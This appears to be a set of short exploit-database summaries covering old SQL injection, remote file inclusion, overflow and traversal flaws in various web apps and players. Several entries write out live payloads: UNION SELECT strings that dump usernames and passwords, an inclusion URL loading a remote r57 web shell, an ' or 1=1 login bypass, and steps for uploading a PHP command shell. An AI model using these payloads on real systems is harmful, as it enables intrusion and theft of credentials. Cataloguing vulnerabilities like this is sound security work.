An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter entry_id. An example of such a query is -9999+union+all+select+1,concat(username,char(58),password),3,4+from+user-- or -9999+union+all+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,0,11,12,13,14+from+user--&mod_action=detail. This query will allow the attacker to view the username and password of the users in the database.
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the removeChild() method. By passing an object to the removeChild() method, an attacker can cause a NULL pointer dereference resulting in a crash.
The default prefix for database tables is 'yap_' but can be changed at installation. A PoC is provided to demonstrate how to extract the username and password from the database. An SQL injection is also provided to extract the username and password from the database, but the user must be logged in as an administrator.
PHPLinkAdmin 1.0 is vulnerable to Remote File Inclusion and SQL Injection. The vulnerable code is present in linkadmin.php and edlink.php respectively. The PoC for Remote File Inclusion is http://127.0.0.1/path/linkadmin.php?page=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt? and for SQL Injection is http://127.0.0.1/path/edlink.php?linkid=-1' union all select 1,2,3,4,concat_ws(0x3a,user(),database(),version())'--
This exploit allows an attacker to execute arbitrary code on a vulnerable system by exploiting a buffer overflow vulnerability in Rosoft media player. The exploit is multi-targeted and works on Microsoft Windows Trust SP3 (French), Microsoft Windows Trust SP2 (French), Microsoft Windows XP SP3 (French) and Microsoft Windows XP SP2 (French). The attacker can choose to execute either calc.exe or bindshell LPORT=7777. The exploit was coded by SimO-s0fT and was released in 2008.
The VLC 0.9.8a Web UI is vulnerable to a remote stack overflow. An attacker can send a specially crafted HTTP request with a large input parameter to the vulnerable server, which will cause the server to crash.
A denial of service vulnerability exists in FTP Serv-U up to 7.4.0.1, which allows an attacker to saturate the server and cause it to stop responding. This is achieved by sending an SMNT command followed by a '**' sequence to the server.
The vulnerability is caused by an input validation error when handling FTP "MKD" requests. This can be exploited to escape the FTP root and create arbitrary directories on the system via directory traversal attacks using the ".." character sequence.
UBBThreads is vulnerable to SQL injection in the admin login page. An attacker can use the UNION SELECT statement to obtain the admin users' plaintext passwords. The attacker can also turn on file attachments via /ubbthreads/admin/editconfig.php?Cat= and then upload a PHP command shell as an attachment to a post. Additionally, the attacker can query the MySQL database via /ubbthreads/admin/dbcommand.php?Cat= and get the MySQL username/password (which is stored in plaintext) by viewing the HTML source of /ubbthreads/admin/editconfig.php?Cat=.
A vulnerability in Kim Websites 1.0 allows an attacker to bypass authentication by entering ' or 1=1/* as the username and leaving the password field blank.